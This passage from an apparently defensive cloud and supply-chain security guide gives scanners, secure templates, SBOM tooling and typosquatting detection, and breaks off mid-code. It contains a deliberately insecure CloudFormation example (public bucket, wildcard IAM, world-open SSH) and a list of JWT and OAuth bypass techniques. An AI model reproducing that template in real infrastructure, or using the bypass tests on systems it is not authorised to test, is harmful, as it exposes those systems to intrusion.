# Time pattern deviation
expected_time = baseline.get('typical_hours', set())
transaction_hour = transaction.timestamp.hour
if transaction_hour not in expected_time:
deviations.append('unusual_time')
# Device fingerprint deviation
current_fingerprint = self.create_device_fingerprint(
transaction.user_agent,
transaction.ip_address,
transaction.screen_resolution
)
if current_fingerprint != baseline.get('device_fingerprint'):
deviations.append('new_device')
# Transaction pattern deviation
transaction_pattern = {
'amount': transaction.amount,
'recipient': transaction.recipient,
'category': transaction.category
}
similarity = self.calculate_similarity(
transaction_pattern,
baseline.get('transaction_patterns', [])
)
if similarity < 0.3: # Low similarity threshold
deviations.append('unusual_pattern')
        return len(deviations) * 15

Rate Limiting with Adaptive Algorithms
class AdaptiveRateLimiter:
def __init__(self):
        self.windows = {
            'minute': 60,
            'hour': 3600,
            'day': 86400,
            'week': 604800
        }
self.adaptive_thresholds = {}
self.suspicious_patterns = {}
def is_rate_limited(self, key, endpoint):
"""
Adaptive rate limiting decision
"""
# Get current request pattern
pattern = self.get_request_pattern(key, endpoint)
# Check against multiple time windows
for window_name, window_seconds in self.windows.items():
count = self.get_request_count(key, endpoint, window_seconds)
# Adaptive threshold based on behavior
threshold = self.get_adaptive_threshold(
key, endpoint, window_name
)
if count >= threshold:
# Check if this is a suspicious pattern
if self.is_suspicious_pattern(pattern):
# Aggressive limiting for suspicious patterns
self.record_suspicious_activity(key, endpoint)
return True
# Normal rate limit hit
return True
return False
def get_adaptive_threshold(self, key, endpoint, window):
"""
Calculate adaptive threshold based on historical behavior
"""
baseline_key = f"{endpoint}:{window}"
if baseline_key not in self.adaptive_thresholds:
# Initial threshold
return self.get_default_threshold(window)
baseline = self.adaptive_thresholds[baseline_key]
# Adjust based on time of day
hour = datetime.now().hour
if 0 <= hour < 6: # Night hours
threshold = baseline * 0.5 # Lower threshold
elif 9 <= hour < 17: # Business hours
threshold = baseline * 1.5 # Higher threshold
else:
threshold = baseline
# Adjust based on recent suspicious activity
suspicious_count = self.get_suspicious_count(key, '24h')
if suspicious_count > 0:
threshold = threshold / (suspicious_count + 1)
        return max(threshold, self.get_minimum_threshold(window))

Configuration Drift Analysis
Configuration drift occurs when running systems gradually diverge from their known, secure baseline. This happens through:
- Manual hotfixes applied directly to production
- Emergency changes without documentation
- Patch accumulation creating inconsistent states
- Configuration leakage through backup files
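Detecting drift usually reduces to comparing hashes of tracked configuration files against an approved baseline. A minimal sketch with illustrative paths and baseline file name:

import hashlib
import json
import pathlib

TRACKED = ["/etc/nginx/nginx.conf", "/etc/ssh/sshd_config"]   # illustrative paths

def snapshot(paths):
    # Hash every tracked file that exists on this host
    return {p: hashlib.sha256(pathlib.Path(p).read_bytes()).hexdigest()
            for p in paths if pathlib.Path(p).exists()}

def detect_drift(baseline_file="config-baseline.json"):
    # Baseline is a previously approved snapshot stored outside the host
    baseline = json.loads(pathlib.Path(baseline_file).read_text())
    current = snapshot(TRACKED)
    return {path: digest for path, digest in current.items()
            if baseline.get(path) != digest}

# Any non-empty result means production has diverged from the approved baseline.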
Cloud-Specific Misconfigurations
# AWS CloudFormation vulnerable template
Resources:
PublicS3Bucket:
Type: AWS::S3::Bucket
Properties:
AccessControl: PublicRead # BAD: Public access
VersioningConfiguration:
Status: Enabled
OverlyPermissiveLambda:
Type: AWS::IAM::Role
Properties:
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Principal:
Service: lambda.amazonaws.com
Action: sts:AssumeRole
Policies:
- PolicyName: root
PolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Action: "*" # BAD: Wildcard permission
Resource: "*"
ExposedSecurityGroup:
Type: AWS::EC2::SecurityGroup
Properties:
GroupDescription: Allow SSH from anywhere
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: 22
ToPort: 22
        CidrIp: 0.0.0.0/0  # BAD: SSH open to the internet

Automated Configuration Scanning Framework
class ConfigurationScanner:
def __init__(self):
self.checkers = self.load_checkers()
self.baselines = self.load_baselines()
self.compliance_frameworks = {
'CIS': self.load_cis_benchmarks(),
'NIST': self.load_nist_controls(),
'PCI-DSS': self.load_pci_requirements()
}
def scan_web_server(self, server_config):
"""
Comprehensive web server configuration audit
"""
findings = []
# 1. HTTP Headers Analysis
headers_findings = self.analyze_headers(server_config.headers)
findings.extend(headers_findings)
# 2. TLS Configuration
tls_findings = self.analyze_tls(server_config.ssl)
findings.extend(tls_findings)
# 3. Directory and File Permissions
permission_findings = self.analyze_permissions(server_config.paths)
findings.extend(permission_findings)
# 4. Module and Feature Analysis
module_findings = self.analyze_modules(server_config.modules)
findings.extend(module_findings)
# 5. Logging Configuration
logging_findings = self.analyze_logging(server_config.logging)
findings.extend(logging_findings)
return self.prioritize_findings(findings)
def analyze_headers(self, headers):
"""
Analyze security headers
"""
required_headers = {
'Strict-Transport-Security': {
'required': True,
'min_age': 31536000, # 1 year
'include_subdomains': True,
'preload': False
},
'X-Frame-Options': {
'required': True,
'values': ['DENY', 'SAMEORIGIN']
},
'X-Content-Type-Options': {
'required': True,
'values': ['nosniff']
},
'Content-Security-Policy': {
'required': True,
'strict_default': True
},
'X-Permitted-Cross-Domain-Policies': {
'required': False,
'values': ['none']
},
'Referrer-Policy': {
'required': True,
'values': ['no-referrer', 'strict-origin-when-cross-origin']
},
'Permissions-Policy': {
'required': True,
'restricted_features': [
'geolocation', 'camera', 'microphone'
]
}
}
findings = []
for header_name, requirements in required_headers.items():
header_value = headers.get(header_name)
if requirements['required'] and not header_value:
findings.append({
'severity': 'High',
'type': 'missing_header',
'header': header_name,
'description': f'Missing required security header: {header_name}'
})
elif header_value:
# Validate header value
if 'values' in requirements:
if header_value not in requirements['values']:
findings.append({
'severity': 'Medium',
'type': 'invalid_header_value',
'header': header_name,
'current_value': header_value,
'recommended': requirements['values'],
'description': f'Invalid value for {header_name}'
})
return findings
def analyze_tls(self, ssl_config):
"""
Comprehensive TLS configuration analysis
"""
findings = []
# Protocol versions
if 'SSLv2' in ssl_config.protocols or 'SSLv3' in ssl_config.protocols:
findings.append({
'severity': 'Critical',
'type': 'weak_protocol',
'protocol': 'SSLv2/SSLv3',
'description': 'Deprecated SSL protocols enabled'
})
if 'TLSv1.0' in ssl_config.protocols:
findings.append({
'severity': 'High',
'type': 'weak_protocol',
'protocol': 'TLSv1.0',
'description': 'TLS 1.0 is deprecated and insecure'
})
# Cipher suites
weak_ciphers = [
'NULL', 'EXPORT', 'RC4', 'DES', '3DES',
'MD5', 'SHA1', 'CBC', 'PSK', 'SRP'
]
for cipher in ssl_config.ciphers:
if any(weak in cipher for weak in weak_ciphers):
findings.append({
'severity': 'High',
'type': 'weak_cipher',
'cipher': cipher,
'description': f'Weak cipher suite enabled: {cipher}'
})
# Certificate validation
if not ssl_config.certificate_validation:
findings.append({
'severity': 'High',
'type': 'certificate_validation',
'description': 'Certificate validation disabled'
})
        return findings

Cloud Security Posture Management (CSPM)
class CSPMScanner:
def __init__(self, cloud_provider):
self.provider = cloud_provider
self.client = self.initialize_client()
self.benchmarks = self.load_benchmarks()
def scan_entire_environment(self):
"""
Comprehensive cloud environment scan
"""
findings = []
# 1. Identity and Access Management
iam_findings = self.scan_iam()
findings.extend(iam_findings)
# 2. Compute Resources
compute_findings = self.scan_compute()
findings.extend(compute_findings)
# 3. Storage Resources
storage_findings = self.scan_storage()
findings.extend(storage_findings)
# 4. Networking
networking_findings = self.scan_networking()
findings.extend(networking_findings)
# 5. Database Services
database_findings = self.scan_databases()
findings.extend(database_findings)
# 6. Logging and Monitoring
logging_findings = self.scan_logging()
findings.extend(logging_findings)
return self.aggregate_findings(findings)
def scan_iam(self):
"""
IAM configuration scanning
"""
findings = []
# Get all IAM policies
policies = self.client.list_policies()
for policy in policies:
# Check for wildcard permissions
if self.has_wildcard_permissions(policy):
findings.append({
'severity': 'High',
'resource': policy['Arn'],
'type': 'wildcard_permissions',
'description': f'IAM policy {policy["PolicyName"]} contains wildcard permissions'
})
# Check for administrative privileges
if self.has_admin_privileges(policy):
findings.append({
'severity': 'High',
'resource': policy['Arn'],
'type': 'admin_privileges',
'description': f'IAM policy {policy["PolicyName"]} grants administrative privileges'
})
# Check for users with console passwords and MFA disabled
users = self.client.list_users()
for user in users:
mfa_devices = self.client.list_mfa_devices(user['UserName'])
# Check for password existence
login_profile = self.client.get_login_profile(user['UserName'])
if login_profile and not mfa_devices:
findings.append({
'severity': 'High',
'resource': user['Arn'],
'type': 'no_mfa',
'description': f'User {user["UserName"]} has console password but no MFA enabled'
})
# Check for unused credentials
credential_report = self.client.generate_credential_report()
for user_report in credential_report:
if user_report['password_last_used'] == 'N/A' and user_report['password_enabled'] == 'true':
days_since_created = (datetime.now() - user_report['user_creation_time']).days
if days_since_created > 90:
findings.append({
'severity': 'Medium',
'resource': user_report['arn'],
'type': 'unused_credentials',
'description': f'User {user_report["user"]} has unused credentials older than 90 days'
})
        return findings

Secure Infrastructure as Code Template
# Secure AWS CloudFormation Template
AWSTemplateFormatVersion: '2010-09-09'
Description: 'Secure Infrastructure Template with embedded security controls'
Metadata:
SecurityControls:
- NIST-800-53: AC-3
- NIST-800-53: AC-6
- NIST-800-53: SC-7
- NIST-800-53: SC-28
Parameters:
Environment:
Type: String
AllowedValues: [dev, staging, prod]
Default: dev
AllowedIPRange:
Type: String
Default: 10.0.0.0/8
Description: 'Allowed IP range for administrative access'
Resources:
# Secure VPC with isolated subnets
VPC:
Type: AWS::EC2::VPC
Properties:
CidrBlock: 10.0.0.0/16
EnableDnsHostnames: true
EnableDnsSupport: true
Tags:
- Key: Environment
Value: !Ref Environment
# Private subnets for sensitive resources
PrivateSubnet1:
Type: AWS::EC2::Subnet
Properties:
VpcId: !Ref VPC
CidrBlock: 10.0.1.0/24
AvailabilityZone: !Select [0, !GetAZs '']
Tags:
- Key: Network
Value: Private
# Security Group with least privilege
AppSecurityGroup:
Type: AWS::EC2::SecurityGroup
Properties:
GroupDescription: 'Application security group with least privilege'
VpcId: !Ref VPC
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: 443
ToPort: 443
CidrIp: 0.0.0.0/0
Description: 'HTTPS from anywhere'
- IpProtocol: tcp
FromPort: 22
ToPort: 22
CidrIp: !Ref AllowedIPRange
Description: 'SSH from admin network only'
SecurityGroupEgress:
- IpProtocol: -1
CidrIp: 0.0.0.0/0
Description: 'Allow all outbound'
# IAM Role with least privilege
AppRole:
Type: AWS::IAM::Role
Properties:
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Principal:
Service: ec2.amazonaws.com
Action: sts:AssumeRole
Policies:
- PolicyName: AppPolicy
PolicyDocument:
Version: '2012-10-17'
Statement:
- Sid: 'AllowS3ReadOnly'
Effect: Allow
Action:
- s3:GetObject
- s3:ListBucket
Resource:
- !Sub 'arn:aws:s3:::${AppBucket}'
- !Sub 'arn:aws:s3:::${AppBucket}/*'
- Sid: 'AllowCloudWatchLogs'
Effect: Allow
Action:
- logs:CreateLogGroup
- logs:CreateLogStream
- logs:PutLogEvents
Resource: '*'
ManagedPolicyArns:
- arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
# Encrypted S3 Bucket
AppBucket:
Type: AWS::S3::Bucket
Properties:
BucketEncryption:
ServerSideEncryptionConfiguration:
- ServerSideEncryptionByDefault:
SSEAlgorithm: AES256
PublicAccessBlockConfiguration:
BlockPublicAcls: true
BlockPublicPolicy: true
IgnorePublicAcls: true
RestrictPublicBuckets: true
VersioningConfiguration:
Status: Enabled
LoggingConfiguration:
DestinationBucketName: !Ref LogBucket
LogFilePrefix: 'app-access-logs/'
# S3 Bucket Policy
AppBucketPolicy:
Type: AWS::S3::BucketPolicy
Properties:
Bucket: !Ref AppBucket
PolicyDocument:
Version: '2012-10-17'
Statement:
- Sid: 'DenyNonSSLRequests'
Effect: Deny
Principal: '*'
Action: 's3:*'
Resource:
- !Sub '${AppBucket.Arn}'
- !Sub '${AppBucket.Arn}/*'
Condition:
Bool:
'aws:SecureTransport': false
# CloudTrail for auditing
CloudTrail:
Type: AWS::CloudTrail::Trail
Properties:
IsLogging: true
S3BucketName: !Ref LogBucket
EventSelectors:
- IncludeManagementEvents: true
ReadWriteType: All
IsMultiRegionTrail: true
EnableLogFileValidation: true
KMSKeyId: !Ref TrailKMSKey
# KMS Key for encryption
TrailKMSKey:
Type: AWS::KMS::Key
Properties:
Description: 'KMS key for CloudTrail encryption'
EnableKeyRotation: true
KeyPolicy:
Version: '2012-10-17'
Id: key-consolepolicy-3
Statement:
- Sid: 'Enable IAM User Permissions'
Effect: Allow
Principal:
AWS: !Sub 'arn:aws:iam::${AWS::AccountId}:root'
Action: 'kms:*'
Resource: '*'
- Sid: 'Allow CloudTrail to encrypt logs'
Effect: Allow
Principal:
Service: cloudtrail.amazonaws.com
Action:
- kms:GenerateDataKey*
- kms:DescribeKey
Resource: '*'
Condition:
StringLike:
'kms:EncryptionContext:aws:cloudtrail:arn':
!Sub 'arn:aws:cloudtrail:*:${AWS::AccountId}:trail/*'
Outputs:
VPCId:
Description: 'VPC ID'
Value: !Ref VPC
AppSecurityGroupId:
Description: 'Application Security Group ID'
Value: !Ref AppSecurityGroup
AppRoleArn:
Description: 'Application IAM Role ARN'
    Value: !GetAtt AppRole.Arn

GitOps Security Pipeline
# .github/workflows/security-scan.yml
name: Security Scanning Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
jobs:
infrastructure-security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Terraform Security Scan
uses: bridgecrewio/checkov-action@master
with:
directory: terraform/
soft_fail: false
framework: terraform
quiet: true
- name: Kubernetes Manifest Security
uses: stackrox/kube-linter-action@v1
with:
path: kubernetes/
config: .kube-linter.yaml
- name: Dockerfile Security
uses: aquasecurity/trivy-action@master
with:
scan-type: 'config'
scan-ref: 'Dockerfile'
application-security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: SAST Scanning
uses: github/codeql-action/init@v1
with:
languages: javascript, python, java
- name: Dependency Scanning
uses: snyk/actions/node@master
env:
SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
with:
args: --severity-threshold=high
- name: Secret Scanning
uses: gitleaks/gitleaks-action@master
env:
GITLEAKS_CONFIG: .gitleaks.toml
compliance-validation:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: CIS Benchmark Compliance
uses: aws-actions/aws-cloudformation-cis-benchmark@v1
with:
stack-name: production-stack
- name: NIST Compliance Check
uses: nist-800-53/compliance-check@v1
with:
framework: nist-800-53-rev5
deployment-security:
runs-on: ubuntu-latest
needs: [infrastructure-security, application-security, compliance-validation]
if: success()
steps:
- name: Security Gate Approval
uses: 1password/load-secrets-action@v1
with:
export-env: true
env:
OP_SERVICE_ACCOUNT_TOKEN: ${{ secrets.OP_SERVICE_ACCOUNT_TOKEN }}
OP_SECRET_REFERENCE_APPROVAL: 'vaults/security/items/approval-token'
- name: Deploy with Security Context
run: |
          kubectl apply -f kubernetes/ --context=security-audited

Software Bill of Materials (SBOM) Analysis
SBOMs provide a machine-readable inventory of software components. Key standards:
- SPDX (Software Package Data Exchange): ISO/IEC 5962:2021 standard
- CycloneDX: OWASP standard for software composition analysis
- SWID (Software Identification): ISO/IEC 19770-2:2015
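A minimal CycloneDX-style document can be assembled from a parsed dependency list, though in practice a dedicated generator (syft, cyclonedx tooling, etc.) should produce it. A sketch with an illustrative dependency entry:

import json
import uuid
from datetime import datetime, timezone

# Illustrative output of a manifest parser
dependencies = [{"name": "requests", "version": "2.31.0", "ecosystem": "pypi"}]

sbom = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "serialNumber": f"urn:uuid:{uuid.uuid4()}",
    "version": 1,
    "metadata": {"timestamp": datetime.now(timezone.utc).isoformat()},
    "components": [
        {
            "type": "library",
            "name": dep["name"],
            "version": dep["version"],
            "purl": f"pkg:{dep['ecosystem']}/{dep['name']}@{dep['version']}",
        }
        for dep in dependencies
    ],
}
print(json.dumps(sbom, indent=2))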
Dependency Graph Attack Vectors
graph TD
A[Main Application] --> B[Direct Dependency v1.2.0]
B --> C[Transitive Dependency v0.8.3]
C --> D[Vulnerable Library v2.1.0]
D --> E[CVE-2023-1234: RCE]
F[Malicious Package] --> G[Typosquatting: 'requrests']
G --> H[Direct Dependency Compromise]
I[Build System] --> J[Compromised Plugin]
J --> K[Backdoored Artifacts]
L[Package Registry] --> M[Hijacked Maintainer Account]
M --> N[Malicious Version Published]
Software Composition Analysis Framework
class AdvancedSCA:
def __init__(self):
self.vulnerability_dbs = {
'nvd': NVDDatabase(),
'osv': OSVDatabase(),
'ghsa': GitHubAdvisoryDatabase(),
'snyk': SnykDatabase()
}
self.sbom_generators = {
'spdx': SPDXGenerator(),
'cyclonedx': CycloneDXGenerator(),
'swid': SWIDGenerator()
}
self.behavioral_scanners = {
'network': NetworkBehaviorScanner(),
'filesystem': FilesystemBehaviorScanner(),
'process': ProcessBehaviorScanner()
}
def comprehensive_scan(self, project_path):
"""
Multi-dimensional supply chain security scan
"""
results = {
'inventory': None,
'vulnerabilities': [],
'licenses': [],
'behavioral_analysis': {},
'provenance': {}
}
# Step 1: Generate comprehensive SBOM
results['inventory'] = self.generate_sbom(project_path)
# Step 2: Vulnerability correlation
results['vulnerabilities'] = self.analyze_vulnerabilities(
results['inventory']
)
# Step 3: License compliance check
results['licenses'] = self.check_licenses(results['inventory'])
# Step 4: Behavioral analysis
results['behavioral_analysis'] = self.perform_behavioral_analysis(
project_path
)
# Step 5: Provenance verification
results['provenance'] = self.verify_provenance(project_path)
# Step 6: Risk scoring
results['risk_score'] = self.calculate_risk_score(results)
return results
def generate_sbom(self, project_path):
"""
Generate comprehensive software bill of materials
"""
sbom = {
'metadata': {
'timestamp': datetime.now().isoformat(),
'tool': 'AdvancedSCA v1.0',
'project': os.path.basename(project_path)
},
'components': [],
'dependencies': [],
'relationships': []
}
# Detect package managers and parse manifests
package_managers = self.detect_package_managers(project_path)
for pm in package_managers:
components = pm.parse_manifest(project_path)
sbom['components'].extend(components)
# Build dependency graph
dependency_graph = pm.build_dependency_graph(components)
sbom['dependencies'].extend(dependency_graph)
# Extract relationship information
relationships = pm.extract_relationships(components)
sbom['relationships'].extend(relationships)
# Add runtime dependencies
runtime_deps = self.analyze_runtime_dependencies(project_path)
sbom['components'].extend(runtime_deps)
# Add transitive dependencies
transitive_deps = self.resolve_transitive_dependencies(
sbom['dependencies']
)
sbom['components'].extend(transitive_deps)
return sbom
def analyze_vulnerabilities(self, sbom):
"""
Correlate components with vulnerability databases
"""
vulnerabilities = []
for component in sbom['components']:
# Query multiple vulnerability databases
component_vulns = []
for db_name, db in self.vulnerability_dbs.items():
vulns = db.query(
name=component['name'],
version=component['version'],
ecosystem=component['ecosystem']
)
# Enrich vulnerability data
enriched_vulns = self.enrich_vulnerability_data(vulns)
component_vulns.extend(enriched_vulns)
# Deduplicate and prioritize
unique_vulns = self.deduplicate_vulnerabilities(component_vulns)
prioritized_vulns = self.prioritize_vulnerabilities(unique_vulns)
vulnerabilities.append({
'component': component,
'vulnerabilities': prioritized_vulns
})
return vulnerabilities
def perform_behavioral_analysis(self, project_path):
"""
Behavioral analysis of dependencies
"""
behaviors = {
'network': [],
'filesystem': [],
'process': [],
'memory': []
}
# Create isolated sandbox
sandbox = self.create_sandbox()
# Install and execute in sandbox
sandbox.install_dependencies(project_path)
sandbox.execute_application()
# Monitor behaviors
behaviors['network'] = self.behavioral_scanners['network'].monitor(
sandbox
)
behaviors['filesystem'] = self.behavioral_scanners['filesystem'].monitor(
sandbox
)
behaviors['process'] = self.behavioral_scanners['process'].monitor(
sandbox
)
# Analyze behavioral patterns
suspicious_behaviors = self.detect_suspicious_patterns(behaviors)
return {
'raw_behaviors': behaviors,
'suspicious': suspicious_behaviors,
'risk_level': self.calculate_behavioral_risk(suspicious_behaviors)
        }

Dependency Confusion Detection
class DependencyConfusionDetector:
def __init__(self):
self.public_registries = [
'https://registry.npmjs.org',
'https://pypi.org',
'https://repo.maven.apache.org/maven2',
'https://nuget.org'
]
self.internal_registries = []
self.typosquatting_patterns = self.load_typosquatting_patterns()
def detect_confusion(self, package_manifest):
"""
Detect dependency confusion vulnerabilities
"""
findings = []
# Get all dependencies
dependencies = self.extract_dependencies(package_manifest)
for dep in dependencies:
# Check if dependency could be confused
if self.is_confusion_candidate(dep):
# Check public registries
public_versions = self.check_public_registry(dep)
if public_versions:
# Confusion possible
findings.append({
'dependency': dep,
'type': 'dependency_confusion',
'public_versions': public_versions,
'risk': 'High',
'description': f'Dependency {dep["name"]} exists in public registry'
})
# Check for typosquatting
typosquatting_candidates = self.find_typosquatting_candidates(
dep['name']
)
for candidate in typosquatting_candidates:
if self.check_public_registry({'name': candidate}):
findings.append({
'dependency': dep,
'type': 'typosquatting',
'malicious_package': candidate,
'risk': 'Critical',
'description': f'Typosquatting candidate {candidate} exists'
})
return findings
def is_confusion_candidate(self, dependency):
"""
Determine if a dependency is a confusion candidate
"""
# Criteria for confusion candidates:
# 1. Common package names
# 2. No namespace/scoped package
# 3. Simple names that could exist publicly
name = dependency['name']
# Check if it's scoped (@org/package)
if '/' in name or name.startswith('@'):
return False
# Check if it's a common dictionary word
if self.is_common_word(name):
return True
# Check if similar names exist in public registries
similar_count = self.count_similar_public_packages(name)
return similar_count > 0
def find_typosquatting_candidates(self, package_name):
"""
Generate potential typosquatting candidates
"""
candidates = []
# Common typosquatting techniques
techniques = [
# Character omission
lambda s: [s[:i] + s[i+1:] for i in range(len(s))],
# Character duplication
lambda s: [s[:i] + s[i] + s[i:] for i in range(len(s))],
# Character substitution
lambda s: [
s[:i] + c + s[i+1:]
for i in range(len(s))
for c in 'abcdefghijklmnopqrstuvwxyz'
if c != s[i]
],
# Character transposition
lambda s: [
s[:i] + s[i+1] + s[i] + s[i+2:]
for i in range(len(s)-1)
],
# Homoglyph substitution
lambda s: self.apply_homoglyphs(s),
# Addition of separators
lambda s: [s[:i] + '-' + s[i:] for i in range(1, len(s))],
]
for technique in techniques:
candidates.extend(technique(package_name))
# Remove duplicates and original
candidates = list(set(candidates))
if package_name in candidates:
candidates.remove(package_name)
        return candidates[:50]  # Limit to top 50 candidates

Secure Software Factory Pattern
class SecureSoftwareFactory:
def __init__(self):
self.sbom_manager = SBOMManager()
self.artifact_signing = ArtifactSigning()
self.provenance_tracker = ProvenanceTracker()
self.verification_pipeline = VerificationPipeline()
def build_secure_artifact(self, source_code):
"""
End-to-end secure build process
"""
# Phase 1: Source Verification
source_verification = self.verify_source(source_code)
if not source_verification.valid:
raise BuildError("Source verification failed")
# Phase 2: Dependency Resolution with Verification
dependencies = self.resolve_dependencies(source_code)
verified_deps = self.verify_dependencies(dependencies)
# Phase 3: Secure Build Environment
build_env = self.create_secure_build_environment()
# Phase 4: Build with Integrity
artifact = self.build_artifact(
source_code,
verified_deps,
build_env
)
# Phase 5: Generate Provenance
provenance = self.generate_provenance(
source_code,
dependencies,
build_env,
artifact
)
# Phase 6: Sign Artifact
signed_artifact = self.sign_artifact(artifact, provenance)
# Phase 7: Store in Secure Registry
self.store_in_registry(signed_artifact)
return {
'artifact': signed_artifact,
'provenance': provenance,
'sbom': self.sbom_manager.generate(artifact),
'verification_report': self.generate_verification_report()
}
def verify_dependencies(self, dependencies):
"""
Multi-layered dependency verification
"""
verified_deps = []
for dep in dependencies:
# Layer 1: Signature verification
if not self.verify_signature(dep):
raise SecurityError(f"Invalid signature for {dep['name']}")
# Layer 2: Hash verification
if not self.verify_hash(dep):
raise SecurityError(f"Hash mismatch for {dep['name']}")
# Layer 3: SBOM verification
dep_sbom = self.sbom_manager.retrieve(dep)
if not self.verify_sbom(dep_sbom):
raise SecurityError(f"SBOM verification failed for {dep['name']}")
# Layer 4: Vulnerability check
vulns = self.check_vulnerabilities(dep_sbom)
if vulns['critical'] > 0:
raise SecurityError(
f"Critical vulnerabilities in {dep['name']}"
)
# Layer 5: License compliance
if not self.check_license_compliance(dep_sbom):
raise SecurityError(
f"License violation for {dep['name']}"
)
verified_deps.append({
**dep,
'verification': {
'signature': 'valid',
'hash': 'valid',
'sbom': 'valid',
'vulnerabilities': vulns,
'license': 'compliant'
}
})
return verified_deps
def generate_provenance(self, source, dependencies, environment, artifact):
"""
Generate comprehensive build provenance
"""
provenance = {
'metadata': {
'build_id': str(uuid.uuid4()),
'timestamp': datetime.now().isoformat(),
'builder': environment['builder'],
'build_command': environment['command']
},
'source': {
'uri': source['uri'],
'digest': source['digest'],
'commit': source['commit'],
'signature': source['signature']
},
'dependencies': [
{
'name': dep['name'],
'version': dep['version'],
'digest': dep['digest'],
'uri': dep['uri'],
'verification': dep['verification']
}
for dep in dependencies
],
'environment': {
'builder_image': environment['builder_image'],
'build_parameters': environment['parameters'],
'isolation': environment['isolation'],
'resource_limits': environment['limits']
},
'artifact': {
'digest': artifact['digest'],
'materials': [
source['digest'],
*[dep['digest'] for dep in dependencies]
],
'byproducts': {
'logs': artifact['logs'],
'metrics': artifact['metrics']
}
},
'signatures': {
'source_signature': source['signature'],
'builder_signature': environment['signature'],
'artifact_signature': artifact['signature']
}
}
# Generate SLSA provenance
provenance['slsa'] = self.generate_slsa_provenance(provenance)
        return provenance

Software Supply Chain Security Platform
# slsa-build.yml - SLSA Level 3 Build Definition
apiVersion: slsa.dev/v1alpha1
kind: BuildDefinition
metadata:
name: secure-application-build
namespace: production
spec:
# Source Requirements
source:
uri: https://github.com/company/application
digest:
sha256: abc123...
signed: true
requireBranch: main
requireTag: v*
# Build Environment
buildType: container
externalParameters:
buildConfig:
steps:
- name: checkout
args: [clone, --depth=1, {{.source.uri}}]
- name: verify-signature
args: [verify, {{.source.digest}}]
- name: resolve-dependencies
args: [install, --frozen-lockfile]
- name: run-tests
args: [test, --coverage]
- name: build-artifact
args: [build, --prod]
# Dependency Requirements
dependencies:
- name: node
version: "18.x"
digest:
sha256: def456...
- name: npm-dependencies
lockfile: package-lock.json
verifySignature: true
- name: build-environment
image: company/build-container:v1.2.3
digest:
sha256: ghi789...
# Build System Requirements
system:
isolated: true
ephemeral: true
hermetic: true
reproducible: true
# Attestation Requirements
attestations:
- predicateType: https://slsa.dev/provenance/v0.2
required: true
- predicateType: https://slsa.dev/vulnerability-scan/v0.1
required: true
- predicateType: https://slsa.dev/license-compliance/v0.1
required: true
# Verification Policies
verification:
- policy: source-verification
enforcement: required
parameters:
minSignatures: 2
trustedKeys:
- key1
- key2
- policy: vulnerability-scan
enforcement: required
parameters:
maxCritical: 0
maxHigh: 3
failOnUnknown: true
- policy: license-compliance
enforcement: required
parameters:
allowed:
- MIT
- Apache-2.0
denied:
- GPL-3.0
- policy: dependency-verification
enforcement: required
parameters:
requireSBOM: true
requireProvenance: true
        requireSignature: true

Authentication Bypass Techniques Evolution
- JWT Attacks (a defensive validation sketch follows this list)
  - Algorithm Confusion: RS256 → HS256
  - Key Injection: `kid` header manipulation
  - Claim Tampering: Role escalation in claims
  - Signature Stripping: Removing signature validation
- OAuth/OIDC Misconfigurations
  - Open Redirector: `redirect_uri` validation bypass
  - PKCE Bypass: Missing or weak code verifier
  - ID Token Replay: Missing nonce validation
  - Token Mix-Up: Confusion between tokens from different authorization servers
- Passwordless Authentication Risks
  - Magic Link Enumeration: Predictable URL patterns
  - Biometric Spoofing: Fake fingerprints/face recognition
  - FIDO2/WebAuthn: Lost or stolen authenticator attacks
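The single most effective mitigation for the JWT attacks above is to pin the accepted algorithm and required claims on the server rather than trusting the token header. Below is a minimal sketch assuming the PyJWT library; the key path, audience, and issuer values are hypothetical placeholders.
import jwt  # PyJWT, assumed available

# Hypothetical values; supply your own key material and identifiers
PUBLIC_KEY = open("rs256_public.pem").read()
EXPECTED_AUDIENCE = "https://api.example.com"
EXPECTED_ISSUER = "https://idp.example.com"

def validate_token(token: str) -> dict:
    # The algorithm list is pinned server-side, so "alg": "none" and
    # RS256->HS256 confusion are rejected regardless of the token header
    return jwt.decode(
        token,
        PUBLIC_KEY,
        algorithms=["RS256"],
        audience=EXPECTED_AUDIENCE,
        issuer=EXPECTED_ISSUER,
        options={"require": ["exp", "iat", "aud", "iss"]},
    )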
Authentication Flow Security Testing
class AuthenticationSecurityTester:
def __init__(self, target_application):
self.target = target_application
self.auth_flows = self.analyze_auth_flows()
self.test_cases = self.generate_test_cases()
def analyze_auth_flows(self):
"""
Reverse engineer authentication flows
"""
flows = {
'registration': self.analyze_registration_flow(),
'login': self.analyze_login_flow(),
'password_reset': self.analyze_password_reset_flow(),
'mfa': self.analyze_mfa_flow(),
'sessions': self.analyze_session_management(),
'oauth': self.analyze_oauth_flow()
}
return flows
def generate_test_cases(self):
"""
Generate comprehensive authentication test cases
"""
test_cases = []
# Registration flow tests
test_cases.extend(self.test_registration_flow())
# Login flow tests
test_cases.extend(self.test_login_flow())
# Password reset tests
test_cases.extend(self.test_password_reset())
# MFA tests
test_cases.extend(self.test_mfa())
# Session management tests
test_cases.extend(self.test_session_management())
# OAuth tests
test_cases.extend(self.test_oauth())
return test_cases
def test_login_flow(self):
"""
Login flow security tests
"""
tests = []
# Test 1: Credential enumeration
tests.extend(self.test_credential_enumeration())
# Test 2: Account lockout bypass
tests.extend(self.test_account_lockout_bypass())
# Test 3: Response timing analysis
tests.extend(self.test_response_timing())
# Test 4: SQL injection in login
tests.extend(self.test_login_injection())
# Test 5: JWT attacks
tests.extend(self.test_jwt_attacks())
# Test 6: Session fixation
tests.extend(self.test_session_fixation())
return tests
def test_credential_enumeration(self):
"""
Test for username/password enumeration
"""
tests = []
# Different response for valid vs invalid username
valid_user_response = self.target.login(
username="known_user",
password="wrong_password"
)
invalid_user_response = self.target.login(
username="unknown_user",
password="wrong_password"
)
if self.detect_enumeration_vulnerability(
valid_user_response,
